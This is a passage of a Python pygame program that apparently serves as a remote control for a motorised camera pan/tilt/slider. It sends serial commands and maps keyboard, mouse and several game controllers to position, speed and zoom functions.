temp='^z'
sendSerial(temp)
def sendZOOMstop():
temp='^N'
sendSerial(temp)
def sendSET1():
temp='^a'
sendSerial(temp)
def sendSET2():
temp='^b'
sendSerial(temp)
def sendSET3():
temp='^c'
sendSerial(temp)
def sendSET4():
temp='^d'
sendSerial(temp)
def sendSET5():
temp='^e'
sendSerial(temp)
def sendSET6():
temp='^f'
sendSerial(temp)
def sendGO1():
temp='^A'
sendSerial(temp)
def sendGO2():
temp='^B'
sendSerial(temp)
def sendGO3():
temp='^C'
sendSerial(temp)
def sendGO4():
temp='^D'
sendSerial(temp)
def sendGO5():
temp='^E'
sendSerial(temp)
def sendGO6():
temp='^F'
sendSerial(temp)
def sendSPEEDfast():
temp='^V'
sendSerial(temp)
def sendSPEEDslow():
temp='^v'
sendSerial(temp)
def sendREPORTall():
temp='^R'
sendSerial(temp)
def sendREPORTpos():
global canSendReport
global previousTicksReport
temp='^W'
sendSerial(temp)
canSendReport = True
previousTicksReport = pygame.time.get_ticks() + intervalReport
def clearPosConfirm():
message_window = UIConfirmationDialog(pygame.Rect((650, 200), (300, 200)),
ui_manager,
action_long_desc='Clear All Position Data?')
def sendCLEARALLpos():
temp='^Y'
sendSerial(temp)
def sendCLEARtext():
global serialText
serialText = ''
textBoxSerial.kill()
serialPortTextBox()
def serialPort_changed():
global ser
global baudRate
global current_serialPort
global serialText
global drop_down_serial
serialPortSelect = drop_down_serial.selected_option
try:
ser = Serial(serialPortSelect , baudRate, timeout=0, writeTimeout=0)
temp='^W'
sendSerial(temp)
readSerial()
except:
ser = ''
serialNotSel = 'Serial port not available!<br>'
textBoxSerial.kill()
serialText = serialNotSel + serialText
serialPortTextBox()
drop_down_serial.kill()
drop_down_serial = UIDropDownMenu(available_ports, # Recreate serial port drop down list
current_serialPort[0], # Currently selected port
pygame.Rect((620,95),
(250, 30)),
ui_manager)
def tohex(val, nbits):
return hex((val + (1 << nbits)) % (1 << nbits))
def sendJoystick(arr):
global ser
global data
sliderInt = int(arr[1], 16)
panInt = int(arr[2], 16)
tiltInt = int(arr[3], 16)
data[0] = 4
if ((sliderInt > 0) and (sliderInt < 256)):
data[1] = 0
data[2] = sliderInt
elif sliderInt > 257:
data[1] = 255
data[2] = (sliderInt-65281)
else:
data[1] = 0
data[2] = 0
if ((panInt > 0) and (panInt < 256)):
data[3] = 0
data[4] = panInt
elif panInt > 257:
data[3] = 255
data[4] = (panInt-65281)
else:
data[3] = 0
data[4] = 0
if ((tiltInt > 0) and (tiltInt < 256)):
data[5] = 0
data[6] = tiltInt
elif tiltInt > 257:
data[5] = 255
data[6] = (tiltInt-65281)
else:
data[5] = 0
data[6] = 0
if ser == '':
pass
else:
ser.write(data)
#print(data)
def serialPortTextBox():
global textBoxSerial
textBoxSerial = UITextBox('<font face=roboto size=5 color=#F0F0F0>' + serialText + '</font>',
pygame.Rect((620, 130), (560, 510)),
ui_manager)
#wrap_to_height=False)
def textBoxJoystickName():
global joystickName
global textBoxJoystickNames
textBoxJoystickNames = UITextBox(joystickName,
pygame.Rect((620, 30), (560, 35)),
ui_manager)
def readSerial():
global ser
global serBuffer
global serialText
global atPos1
global atPos2
global atPos3
global atPos4
global atPos5
global atPos6
global pos1set
global pos2set
global pos3set
global pos4set
global pos5set
global pos6set
global pos1run
global pos2run
global pos3run
global pos4run
global pos5run
global pos6run
global speedIsFast
global speedRec
if (ser == ''):
return
else:
while True:
c = ser.read()
if len(c) == 0:
break
if (c == b'\x04'): # Ignore received joystick commands from other remote
c = ser.read()
c = ser.read()
c = ser.read()
c = ser.read()
c = ser.read()
c = ser.read()
c = ''
elif (c == b'^'):
c = ser.read()
c = ''
elif (c == b'\xb0'): # Change / remove characters that cause error
c = '°'
elif (c == b'\xb2'):
c = '²'
elif (c == b'\xba') or (c == b'\xc2') or (c == b'\xc9'):
c = ''
elif (c == b'\x23'): # c = # Remove HASHTAG commands
c = ser.read()
if c == b'A':
#atPos1 = True
pos1set = True
elif c == b'B':
#atPos2 = True
pos2set = True
elif c == b'C':
#atPos3 = True
pos3set = True
elif c == b'D':
#atPos4 = True
pos4set = True
elif c == b'E':
pos5set = True
#atPos5 = True
elif c == b'F':
#atPos6 = True
pos6set = True
elif c == b'J':
atPos1 = False
atPos2 = False
atPos3 = False
atPos4 = False
atPos5 = False
atPos6 = False
pos1run = True
elif c == b'K':
atPos1 = False
atPos2 = False
atPos3 = False
atPos4 = False
atPos5 = False
atPos6 = False
pos2run = True
elif c == b'L':
atPos1 = False
atPos2 = False
atPos3 = False
atPos4 = False
atPos5 = False
atPos6 = False
pos3run = True
elif c == b'M':
atPos1 = False
atPos2 = False
atPos3 = False
atPos4 = False
atPos5 = False
atPos6 = False
pos4run = True
elif c == b'N':
atPos1 = False
atPos2 = False
atPos3 = False
atPos4 = False
atPos5 = False
atPos6 = False
pos5run = True
elif c == b'O':
atPos1 = False
atPos2 = False
atPos3 = False
atPos4 = False
atPos5 = False
atPos6 = False
pos6run = True
elif c == b'a':
pos1run = False
atPos1 = True
elif c == b'b':
pos2run = False
atPos2 = True
elif c == b'c':
pos3run = False
atPos3 = True
elif c == b'd':
pos4run = False
atPos4 = True
elif c == b'e':
pos5run = False
atPos5 = True
elif c == b'f':
pos6run = False
atPos6 = True
elif c == b'Y':
pos1run = False
pos1set = False
atPos1 = False
pos2run = False
pos2set = False
atPos2 = False
pos3run = False
pos3set = False
atPos3 = False
pos4run = False
pos4set = False
atPos4 = False
pos5run = False
pos5set = False
atPos5 = False
pos6run = False
pos6set = False
atPos6 = False
elif c == b'y':
atPos1 = False
atPos2 = False
atPos3 = False
atPos4 = False
atPos5 = False
atPos6 = False
elif c == b'V':
speedIsFast = True
speedRec = True
elif c == b'v':
speedIsFast = False
speedRec = True
#c = '\n'
c = ''
else:
c = c.decode('ascii')
if (c == '\r'): # check if character is a delimeter
c = '' # don't want returns. chuck it
if (c == '\t'): # check if character is a tab
c = '<br>'#' - ' # adjust
if c == '\n':
serBuffer += '<br>' # replace \n with HTML <br>
#textOUTPUT.insert(END, serBuffer) # code for tkinter
#textOUTPUT.see(END) # code for tkinter
#serialText += serBuffer # code for tkinter
textBoxSerial.kill()
serialText = serBuffer + serialText
serialPortTextBox()
serBuffer = '' # empty the buffer
else:
serBuffer += c # add to the buffer
def sendSerial(sendValue):
global ser
global serialText
if (ser == ''): # Checks to see if com port has been selected
serialNotSel = 'Serial port not selected!<br>'
textBoxSerial.kill()
serialText = serialNotSel + serialText
serialPortTextBox()
#textOUTPUT.insert(END, 'Serial port not selected!\n') # code for tkinter
#textOUTPUT.see(END) # code for tkinter
else:
ser.write(sendValue.encode()) # Send button value to coneected com port
def scale(val, src, dst):
# Scale the given value from the scale of src to the scale of dst.
return ((val - src[0]) / (src[1]-src[0])) * (dst[1]-dst[0]) + dst[0]
def initialiseJoysticks():
global joystick
global joystickName
available_joysticks = [] # for returning
pygame.joystick.init() # Initialise the Joystick sub-module
joystick_count = pygame.joystick.get_count() # Get count of joysticks
for i in range( joystick_count ): # For each joystick:
joystick = pygame.joystick.Joystick( i )
joystick.init()
available_joysticks.append( joystick )
if ( len( available_joysticks ) == 0 ):
joystickName = "No joystick found."
#print( "No joystick found." )
else:
for i,joystk in enumerate( available_joysticks ):
joystickName = joystk.get_name()
#print("Joystick %d is named [%s]" % ( i, joystickName ) )
return available_joysticks
def int_to_bytes(number: int) -> bytes:
return number.to_bytes(length=(8 + (number + (number < 0)).bit_length()) // 8, byteorder='big', signed=True)
def doRefresh():
global drop_down_serial
global ser
global current_serialPort
global baudRate
usb_port = 'usbserial'
wchusb_port = 'wchusbserial'
current_serialPort = ' - '
drop_down_serial.kill() # Clear serial port drop down box
ports = serial.tools.list_ports.comports() # Search for attached serial ports
available_ports = []
for p in ports:
available_ports.append(p.device) # Append each found serial port to array available_ports
if current_serialPort == ' - ':
if (wchusb_port in '\t'.join(available_ports)):
try:
current_serialPort = [string for string in available_ports if wchusb_port in string]
ser = Serial(current_serialPort[0], baudRate, timeout=0, writeTimeout=0)
temp='^W'
sendSerial(temp)
readSerial()
except:
current_serialPort = [' - ']
elif (usb_port in '\t'.join(available_ports)):
try:
current_serialPort = [string for string in available_ports if usb_port in string]
ser = Serial(current_serialPort[0], baudRate, timeout=0, writeTimeout=0)
temp='^W'
sendSerial(temp)
readSerial()
except:
current_serialPort = [' - ']
else:
current_serialPort = [' - ']
drop_down_serial = UIDropDownMenu(available_ports, # Recreate serial port drop down list
current_serialPort[0], # Currently selected port
pygame.Rect((620,95),
(250, 30)),
ui_manager)
initialiseJoysticks()
textBoxJoystickName()
initialiseJoysticks()
if fullscreen:
window_surface = pygame.display.set_mode(resolution,
pygame.FULLSCREEN)
else:
window_surface = pygame.display.set_mode(resolution)
background_surface = None
try:
base_path = Path(__file__).parent # Needed for macOS "py2app"
file_path = (base_path / "./theme.json").resolve()
ui_manager = UIManager(resolution, file_path)
except:
themeFile = "theme.json"
themeFilePath = find_data_file(themeFile)
ui_manager = UIManager(resolution, themeFilePath)
running = True
clock = pygame.time.Clock()
time_delta_stack = deque([])
button_response_timer = pygame.time.Clock()
ui_manager.set_window_resolution(resolution)
ui_manager.clear_and_reset()
background_surface = pygame.Surface(resolution)
background_surface.fill(ui_manager.get_theme().get_colour('dark_bg'))
rel_button_L1 = UIButton(pygame.Rect((120, 180), (60, 60)), '.5', ui_manager, object_id='#everything_button')
rel_button_L10 = UIButton(pygame.Rect((60, 180), (60, 60)), '10', ui_manager, object_id='#everything_button')
rel_button_R1 = UIButton(pygame.Rect((240, 180), (60, 60)), '.5', ui_manager, object_id='#everything_button')
rel_button_R10 = UIButton(pygame.Rect((300, 180), (60, 60)), '10', ui_manager, object_id='#everything_button')
rel_button_U1 = UIButton(pygame.Rect((180, 120), (60, 60)), '.5', ui_manager, object_id='#everything_button')
rel_button_U10 = UIButton(pygame.Rect((180, 60), (60, 60)), '10', ui_manager, object_id='#everything_button')
rel_button_D1 = UIButton(pygame.Rect((180, 240), (60, 60)), '.5', ui_manager, object_id='#everything_button')
rel_button_D10 = UIButton(pygame.Rect((180, 300), (60, 60)), '10', ui_manager, object_id='#everything_button')
#rel_button_set0 = UIButton(pygame.Rect((190, 190), (40, 40)), '0', ui_manager) # Resets position back to zero
rel_button_SL10 = UIButton(pygame.Rect((120, 400), (60, 60)), '10', ui_manager, object_id='#everything_button')
rel_button_SL100 = UIButton(pygame.Rect((60, 400), (60, 60)), '100', ui_manager, object_id='#everything_button')
rel_button_SR10 = UIButton(pygame.Rect((240, 400), (60, 60)), '10', ui_manager, object_id='#everything_button')
rel_button_SR100 = UIButton(pygame.Rect((300, 400), (60, 60)), '100', ui_manager, object_id='#everything_button')
rel_button_SET1 = UIButton(pygame.Rect((30, 560), (60, 60)), 'SET 1', ui_manager, object_id='#everything_button')
rel_button_SET2 = UIButton(pygame.Rect((90, 560), (60, 60)), 'SET 2', ui_manager, object_id='#everything_button')
rel_button_SET3 = UIButton(pygame.Rect((150, 560), (60, 60)), 'SET 3', ui_manager, object_id='#everything_button')
rel_button_SET4 = UIButton(pygame.Rect((210, 560), (60, 60)), 'SET 4', ui_manager, object_id='#everything_button')
rel_button_SET5 = UIButton(pygame.Rect((270, 560), (60, 60)), 'SET 5', ui_manager, object_id='#everything_button')
rel_button_SET6 = UIButton(pygame.Rect((330, 560), (60, 60)), 'SET 6', ui_manager, object_id='#everything_button')
rel_button_GO1 = UIButton(pygame.Rect((30, 500), (60, 60)), 'GO 1', ui_manager, object_id='#everything_button')
rel_button_GO2 = UIButton(pygame.Rect((90, 500), (60, 60)), 'GO 2', ui_manager, object_id='#everything_button')
rel_button_GO3 = UIButton(pygame.Rect((150, 500), (60, 60)), 'GO 3', ui_manager, object_id='#everything_button')
rel_button_GO4 = UIButton(pygame.Rect((210, 500), (60, 60)), 'GO 4', ui_manager, object_id='#everything_button')
rel_button_GO5 = UIButton(pygame.Rect((270, 500), (60, 60)), 'GO 5', ui_manager, object_id='#everything_button')
rel_button_GO6 = UIButton(pygame.Rect((330, 500), (60, 60)), 'GO 6', ui_manager, object_id='#everything_button')
rel_button_CLEARALL = UIButton(pygame.Rect((390, 545), (100, 30)), 'Clear ALL', ui_manager, object_id='#everything_button')
rel_button_Refresh = UIButton(pygame.Rect((430, 35), (160, 35)), 'Refresh Ports', ui_manager, object_id='#everything_button')
rel_button_FAST = UIButton(pygame.Rect((480, 100), (60, 60)), 'FAST', ui_manager, object_id='#everything_button')
rel_button_SLOW = UIButton(pygame.Rect((480, 160), (60, 60)), 'SLOW', ui_manager, object_id='#everything_button')
rel_button_REPORT = UIButton(pygame.Rect((510, 470), (100, 60)), 'Report All', ui_manager, object_id='#everything_button')
rel_button_REPORTPOS = UIButton(pygame.Rect((510, 530), (100, 60)), 'Report Pos', ui_manager, object_id='#everything_button')
rel_button_CLEARtext = UIButton(pygame.Rect((510, 600), (100, 40)), 'Clear Text', ui_manager, object_id='#everything_button')
joystick_label = UILabel(pygame.Rect(540, 10, 230, 24), "Joystick", ui_manager)#, object_id='#main_text_entry')
serial_text_entry = UITextEntryLine(pygame.Rect((930, 95), (250, 35)), ui_manager, object_id='#main_text_entry')
serial_port_label = UILabel(pygame.Rect(550, 70, 230, 24), "Serial Port", ui_manager)
serial_command_label = UILabel(pygame.Rect(870, 70, 230, 24), "Serial Command", ui_manager)
usb_port = 'usbserial'
wchusb_port = 'wchusbserial'
current_serialPort = ' - '
ports = serial.tools.list_ports.comports() # Search for attached serial ports
available_ports = []
for p in ports:
available_ports.append(p.device) # Append each found serial port to array available_ports
if current_serialPort == ' - ':
if (wchusb_port in '\t'.join(available_ports)):
try:
current_serialPort = [string for string in available_ports if wchusb_port in string]
ser = Serial(current_serialPort[0], baudRate, timeout=0, writeTimeout=0)
temp='^W'
sendSerial(temp)
readSerial()
except:
current_serialPort = [' - ']
elif (usb_port in '\t'.join(available_ports)):
try:
current_serialPort = [string for string in available_ports if usb_port in string]
ser = Serial(current_serialPort[0], baudRate, timeout=0, writeTimeout=0)
temp='^W'
sendSerial(temp)
readSerial()
except:
current_serialPort = [' - ']
else:
current_serialPort = [' - ']
drop_down_serial = UIDropDownMenu(available_ports, # Recreate serial port drop down list
current_serialPort[0], # Currently selected port
pygame.Rect((620,95),
(250, 30)),
ui_manager)
serialPortTextBox()
textBoxJoystickName()
joyCircle = pygame.draw.circle(window_surface, pygame.Color("blue"), (225,225), radius)
joyCircle_draging = False
joyCircle.x = 195
joyCircle.y = 195
# Generate crosshair
crosshair = pygame.surface.Surface((30, 30))
crosshair.fill(pygame.Color("magenta"))
pygame.draw.circle(crosshair, pygame.Color("blue"), (radius,radius), radius)
crosshair.set_colorkey(pygame.Color("magenta"))#, pygame.RLEACCEL)
#crosshair = crosshair.convert()
sliderCircle = pygame.draw.circle(window_surface, pygame.Color("blue"), (225,415), radius)
sliderCircle_draging = False
sliderCircle.x = 195
sliderCircle.y = 415
# Generate crosshair
crosshairSlider = pygame.surface.Surface((30, 30))
crosshairSlider.fill(pygame.Color("magenta"))
pygame.draw.circle(crosshairSlider, pygame.Color("blue"), (radius,radius), radius)
crosshairSlider.set_colorkey(pygame.Color("magenta"))#, pygame.RLEACCEL)
#crosshair = crosshair.convert()
ui_manager.set_focus_set(textBoxSerial) # Sets focus so focus can be tested
def process_events():
global arr
global joystick
global joystickName
global button0Pressed
global button1Pressed
global button2Pressed
global button3Pressed
global button4Pressed
global button5Pressed
global button6Pressed
global button7Pressed
global button8Pressed
global button9Pressed
global button10Pressed
global button11Pressed
global button12Pressed
global button13Pressed
global button14Pressed
global button15Pressed
global button16Pressed
global oldAxisX
global oldAxisY
global oldAxisZ
global oldHatX
global oldHatY
global axisX
global axisY
global axisZ
global previousTime
global mouseMoving
global joyCircle_draging
global sliderCircle_draging
global offset_x
global offset_y
global sliderOffset_x
global sliderOffset_y
global running
global joyXreadDOT
global joyYreadDOT
global joyZreadDOT
global panKeyPresseed
global tiltKeyPresseed
global sliderKeyPresseed
global drop_down_serial
global isZooming
joyPS4 = "Sony"
joyPS4BT = "DUALSHOCK"
joyPS4Win = "PS4"
joy360 = "360"
joyNimbus = "Nimbus"
joySN30 = "SN30"
joySN30BT = "Unknown Wireless Controller"
UITextEntry = "UITextEntryLine"
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == pygame.MOUSEBUTTONDOWN:
if 482 <= mouse[0] <= 482+56 and 262 <= mouse[1] <= 262+56:
isZooming = True
sendZOOMin()
#print("IN pressed")
if 482 <= mouse[0] <= 482+56 and 322 <= mouse[1] <= 322+56:
isZooming = True
sendZOOMout()
#print("OUT pressed")
if event.type == pygame.MOUSEBUTTONUP and isZooming:
isZooming = False
sendZOOMstop()
ui_manager.process_events(event)
deadRangeLow = -0.2
deadRangeHigh = 0.2
whereIsFocus = str(ui_manager.get_focus_set())
if (event.type == pygame.KEYDOWN) and not (UITextEntry in whereIsFocus):
if event.key == ord('a'):
axisX = int(-255)
panKeyPresseed = True
#print('Left')
if event.key == ord('d'):
axisX = int(255)
panKeyPresseed = True
#print('Right')
if event.key == ord('w'):
axisY = int(-255)
tiltKeyPresseed = True
#print('Up')
if event.key == ord('s'):
axisY = int(255)
tiltKeyPresseed = True
#print('Down')
if event.key == ord(','):
axisZ = int(-255)
sliderKeyPresseed = True
#print('Slider Left')
if event.key == ord('.'):
axisZ = int(255)
sliderKeyPresseed = True
#print('Slider Right')
if (event.type == pygame.KEYUP) and not (UITextEntry in whereIsFocus):
if event.key == ord('a'):
axisX = int(0)
panKeyPresseed = False
#print('Left stop')
if event.key == ord('d'):
axisX = int(0)
panKeyPresseed = False
#print('Right stop')
if event.key == ord('w'):
axisY = int(0)
tiltKeyPresseed = False
#print('Up stop')
if event.key == ord('s'):
axisY = int(0)
tiltKeyPresseed = False
#print('Down stop')
if event.key == ord(','):
axisZ = int(0)
sliderKeyPresseed = False
#print('Slider Left stop')
if event.key == ord('.'):
axisZ = int(0)
sliderKeyPresseed = False
#print('Slider Right stop')
# left 1
# right 2
# down 3
# up 4
if joystick == '':
pass
else:
if (joyPS4 in joystickName) or (joyPS4BT in joystickName) or (joyPS4Win in joystickName):
#print ("PS4 Controller Found")
hat = joystick.get_hat(0)
hatX = hat[0]
hatY = hat[1]
if (hatX != oldHatX):
oldHatX = hatX
if hatX == 1: # PS4 RIGHT
sendSET2()
if hatX == -1: # PS4 LEFT
sendSET1()
if (hatY != oldHatY):
oldHatY = hatY
if hatY == 1: # PS4 UP
sendSET4()
if hatY == -1: # PS4 DOWN
sendSET3()
if event.type == pygame.JOYBUTTONDOWN:
if (joystick.get_button(0) and not button0Pressed): # PS4 Square
button0Pressed = True
sendGO1()
#print("0 - Squ")
elif (joystick.get_button(1) and not button1Pressed): # PS4 Cross
button1Pressed = True
sendGO3()
#print("1 - Cro")
elif (joystick.get_button(2) and not button2Pressed): # PS4 Circle
button2Pressed = True
sendGO2()
#print("2" - Cir)
elif (joystick.get_button(3) and not button3Pressed): # PS4 Triangle
button3Pressed = True
sendGO4()
#print("3 - Tri")
elif (joystick.get_button(4) and not button4Pressed): # PS4 L1
button4Pressed = True
sendSPEEDslow()
#print("4 - L1")
elif (joystick.get_button(5) and not button5Pressed): # PS4 R1
button5Pressed = True
sendSPEEDfast()
#print("5 - R1")
elif (joystick.get_button(6) and not button6Pressed): # PS4 L2
button6Pressed = True
sendZOOMout()
isZooming = True
#print("6 - L2")
elif (joystick.get_button(7) and not button7Pressed): # PS4 R2
button7Pressed = True
sendZOOMin()
isZooming = True
#print("7 - R2")
elif (joystick.get_button(8) and not button8Pressed): # PS4 Share
button8Pressed = True
sendREPORTpos()
#print("8 - Sha")
elif (joystick.get_button(9) and not button9Pressed): # PS4 Option
button9Pressed = True
sendREPORTpos()
#print("9 - Opt")
elif (joystick.get_button(10) and not button10Pressed): # PS4 L3
buttonL10ressed = True
sendREPORTpos()
#print("10 - L3")
elif (joystick.get_button(11) and not button11Pressed): # PS4 R3
button11Pressed = True
sendREPORTpos()
#print("11 - R3")
if event.type == pygame.JOYBUTTONUP:
if button6Pressed and not joystick.get_button(6):
button6Pressed = False
sendZOOMstop()
isZooming = False
elif button7Pressed and not joystick.get_button(7):
button7Pressed = False
sendZOOMstop()
isZooming = False
if not panKeyPresseed and not tiltKeyPresseed and not joyCircle_draging:
joyXread = joystick.get_axis(0)
joyYread = joystick.get_axis(1)
if (joyXread < deadRangeLow):
axisX = int(scale(joyXread, (-1.0,deadRangeLow), (-255,0)))
elif (joyXread > deadRangeHigh):
axisX = int(scale(joyXread, (deadRangeHigh,1.0), (0,255)))
else:
axisX = 0
if (joyYread < deadRangeLow):
axisY = int(scale(joyYread, (-1.0,deadRangeLow), (-255,0)))
elif (joyYread > deadRangeHigh):
axisY = int(scale(joyYread, (deadRangeHigh,1.0), (0,255)))
else:
axisY = 0
if not sliderKeyPresseed and not sliderCircle_draging:
joyZread = joystick.get_axis(2)
if (joyZread < deadRangeLow):
axisZ = int(scale(joyZread, (-1.0,deadRangeLow), (-255,0)))
elif (joyZread > deadRangeHigh):
axisZ = int(scale(joyZread, (deadRangeHigh,1.0), (0,255)))
else:
axisZ = 0
elif joy360 in joystickName:
#print ("360 Controller Found")
if event.type == pygame.JOYBUTTONDOWN:
if (joystick.get_button(0) and not button0Pressed): # 360 - A
button0Pressed = True
sendGO3()
#print("0 - A")
elif (joystick.get_button(1) and not button1Pressed): # 360 - B
button1Pressed = True
sendGO2()
#print("1 - B")
elif (joystick.get_button(2) and not button2Pressed): # 360 - X
button2Pressed = True
sendGO1()
#print("2 - X")
elif (joystick.get_button(3) and not button3Pressed): # 360 - Y
button3Pressed = True
sendGO4()
#print("3 - Y")
elif (joystick.get_button(4) and not button4Pressed): # 360 - L1
button4Pressed = True
sendSPEEDslow()
#print("4 - L1")
elif (joystick.get_button(5) and not button5Pressed): # 360 - R1
button5Pressed = True
sendSPEEDfast()
#print("5 - R1")
elif (joystick.get_button(6) and not button6Pressed): # 360 - L3
button6Pressed = True
sendREPORTall()
#print("6 - L3")
elif (joystick.get_button(7) and not button7Pressed): # 360 - R3
button7Pressed = True
sendREPORTall()
#print("7 - R3")
elif (joystick.get_button(8) and not button8Pressed): # 360 - Start
button8Pressed = True
sendREPORTall()
#print("8 - Start")
elif (joystick.get_button(9) and not button9Pressed): # 360 - Back
button9Pressed = True
sendREPORTall()
#print("9 - Back")
elif (joystick.get_button(10) and not button10Pressed): # 360 - XBOX
button10Pressed = True
sendREPORTall()
#print("10 - XBOX")
elif (joystick.get_button(11) and not button11Pressed): # 360 - Up
button11Pressed = True
sendSET4()
#print("11 - Up")
elif (joystick.get_button(12) and not button12Pressed): # 360 - Down
button12Pressed = True
sendSET3()
#print("12 - Down")
elif (joystick.get_button(13) and not button13Pressed): # 360 - Left
button13Pressed = True
sendSET1()
#print("13 - Left")
elif (joystick.get_button(14) and not button14Pressed): # 360 - Right
button14Pressed = True
sendSET2()
#print("14 - Right")
if not panKeyPresseed and not tiltKeyPresseed and not joyCircle_draging:
joyXread = joystick.get_axis(0)
joyYread = joystick.get_axis(1)
joyL2read = joystick.get_axis(2)
joyR2read = joystick.get_axis(5)
if (joyXread < deadRangeLow):
axisX = int(scale(joyXread, (-1.0,deadRangeLow), (-255,0)))
elif (joyXread > deadRangeHigh):
axisX = int(scale(joyXread, (deadRangeHigh,1.0), (0,255)))
else:
axisX = 0
if (joyYread < deadRangeLow):
axisY = int(scale(joyYread, (-1.0,deadRangeLow), (-255,0)))
elif (joyYread > deadRangeHigh):
axisY = int(scale(joyYread, (deadRangeHigh,1.0), (0,255)))
else:
axisY = 0
if (joyL2read > 0) and not button15Pressed:
isZooming = True
sendZOOMout()
button15Pressed = True
if (joyR2read > 0) and not button16Pressed:
isZooming = True
sendZOOMin()
button16Pressed = True
if (button15Pressed and (joyL2read < 0)):
isZooming = False
sendZOOMstop()
button15Pressed = False
if (button16Pressed and (joyR2read < 0)):
isZooming = False
sendZOOMstop()
button16Pressed = False
if not sliderKeyPresseed and not sliderCircle_draging:
joyZread = joystick.get_axis(3)
if (joyZread < deadRangeLow):
axisZ = int(scale(joyZread, (-1.0,deadRangeLow), (-255,0)))
elif (joyZread > deadRangeHigh):
axisZ = int(scale(joyZread, (deadRangeHigh,1.0), (0,255)))
else:
axisZ = 0
elif joyNimbus in joystickName:
#print ("Nimbus Controller Found")
if event.type == pygame.JOYBUTTONDOWN:
if (joystick.get_button(0) and not button0Pressed): # Nimbus - A
button0Pressed = True
sendGO3()
#print("0 - A")
elif (joystick.get_button(1) and not button1Pressed): # Nimbus - B
button1Pressed = True
sendGO2()
#print("1 - B")
elif (joystick.get_button(2) and not button2Pressed): # Nimbus - X
button2Pressed = True
sendGO1()
#print("2 - X")
elif (joystick.get_button(3) and not button3Pressed): # Nimbus - Y
button3Pressed = True
sendGO4()
#print("3 - Y")
elif (joystick.get_button(4) and not button4Pressed): # Nimbus - L1
button4Pressed = True
sendSPEEDslow()
#print("4 - L1")
elif (joystick.get_button(5) and not button5Pressed): # Nimbus - R1
button5Pressed = True
sendSPEEDfast()
#print("5 - R1")
elif (joystick.get_button(6) and not button6Pressed): # Nimbus - L2
button6Pressed = True
isZooming = True
sendZOOMout()
#print("6 - L2")
elif (joystick.get_button(7) and not button7Pressed): # Nimbus - R2
button7Pressed = True
isZooming = True
sendZOOMin()
#print("7 - R2")
elif (joystick.get_button(8) and not button8Pressed): # Nimbus - Up
button8Pressed = True
sendSET4()
#print("8 - Up")
elif (joystick.get_button(9) and not button9Pressed): # Nimbus - Down
button9Pressed = True
sendSET3()
#print("9 - Down")
elif (joystick.get_button(10) and not button10Pressed): # Nimbus - Right
button10Pressed = True
sendSET2()
#print("10 - Right")
elif (joystick.get_button(11) and not button11Pressed): # Nimbus - Left
button11Pressed = True
sendSET1()
#print("11 - Left")
elif (joystick.get_button(12) and not button12Pressed): # Nimbus - Menu
button12Pressed = True
sendREPORTall()
#print("12 - Menu")
if event.type == pygame.JOYBUTTONUP:
if button6Pressed and not joystick.get_button(6):
button6Pressed = False
sendZOOMstop()
isZooming = False
elif button7Pressed and not joystick.get_button(7):
button7Pressed = False
sendZOOMstop()
isZooming = False
if not panKeyPresseed and not tiltKeyPresseed and not joyCircle_draging:
joyXread = joystick.get_axis(0)
joyYread = -(joystick.get_axis(1))
if (joyXread < deadRangeLow):
axisX = int(scale(joyXread, (-1.0,deadRangeLow), (-255,0)))
elif (joyXread > deadRangeHigh):
axisX = int(scale(joyXread, (deadRangeHigh,1.0), (0,255)))
else:
axisX = 0
if (joyYread < deadRangeLow):
axisY = int(scale(joyYread, (-1.0,deadRangeLow), (-255,0)))
elif (joyYread > deadRangeHigh):
axisY = int(scale(joyYread, (deadRangeHigh,1.0), (0,255)))
else:
axisY = 0
if not sliderKeyPresseed and not sliderCircle_draging:
joyZread = joystick.get_axis(2)
if (joyZread < deadRangeLow):
axisZ = int(scale(joyZread, (-1.0,deadRangeLow), (-255,0)))
elif (joyZread > deadRangeHigh):
axisZ = int(scale(joyZread, (deadRangeHigh,1.0), (0,255)))
else:
axisZ = 0
elif (joySN30 in joystickName) or (joySN30BT in joystickName):
#print ("SN30 Controller Found")
hat = joystick.get_hat(0)
hatX = hat[0]
hatY = hat[1]
if (hatX != oldHatX):
oldHatX = hatX
if hatX == 1: # SN30 RIGHT
sendSET2()
if hatX == -1: # SN30 LEFT
sendSET1()
if (hatY != oldHatY):
oldHatY = hatY
if hatY == 1: # SN30 UP
sendSET4()
if hatY == -1: # SN30 DOWN
sendSET3()
if event.type == pygame.JOYBUTTONDOWN:
if (joystick.get_button(0) and not button0Pressed): # SN30 - B
button0Pressed = True
sendGO3()
#print("0 - B")
elif (joystick.get_button(1) and not button1Pressed): # SN30 - A
button1Pressed = True
sendGO2()
#print("1 - A")
elif (joystick.get_button(2) and not button2Pressed): # SN30 - Heart
button2Pressed = True
sendREPORTall()
#print("2 - Heart")
elif (joystick.get_button(3) and not button3Pressed): # SN30 - X
button3Pressed = True
sendGO4()
#print("3 - X")
elif (joystick.get_button(4) and not button4Pressed): # SN30 - Y
button4Pressed = True
sendGO1()
#print("4 - Y")
#elif (joystick.get_button(5) and not button5Pressed): # SN30 - None
# button5Pressed = True
# sendREPORTall()
#print("5 - None")
elif (joystick.get_button(6) and not button6Pressed): # SN30 - L1
button6Pressed = True
sendSPEEDslow()
#print("6 - L1")
elif (joystick.get_button(7) and not button7Pressed): # SN30 - R1
button7Pressed = True
sendSPEEDfast()
#print("7 - R1")
elif (joystick.get_button(8) and not button8Pressed): # SN30 - L2
button8Pressed = True
isZooming = True
sendZOOMout()
#print("8 - L2")
elif (joystick.get_button(9) and not button9Pressed): # SN30 - R2
button9Pressed = True
isZooming = True
sendZOOMin()
#print("9 - R2")
elif (joystick.get_button(10) and not button10Pressed): # SN30 - Select
button10Pressed = True
sendREPORTall()
#print("10 - Select")
elif (joystick.get_button(11) and not button11Pressed): # SN30 - Start
button11Pressed = True
sendREPORTall()
#print("11 - Start")
#elif (joystick.get_button(12) and not button12Pressed): # SN30 - None
# button10Pressed = True
# sendREPORTall()
#print("12 - None")
elif (joystick.get_button(13) and not button13Pressed): # SN30 - L3
button13Pressed = True
sendREPORTall()
#print("13 - L3")
elif (joystick.get_button(14) and not button14Pressed): # SN30 - R3
button14Pressed = True
sendREPORTall()
#print("14 - R3")
if event.type == pygame.JOYBUTTONUP:
if button8Pressed and not joystick.get_button(8):
button8Pressed = False
sendZOOMstop()
isZooming = False
elif button9Pressed and not joystick.get_button(9):
button9Pressed = False
sendZOOMstop()
isZooming = False
if not panKeyPresseed and not tiltKeyPresseed and not joyCircle_draging:
joyXread = joystick.get_axis(0)
joyYread = joystick.get_axis(1)
if (joyXread < deadRangeLow):
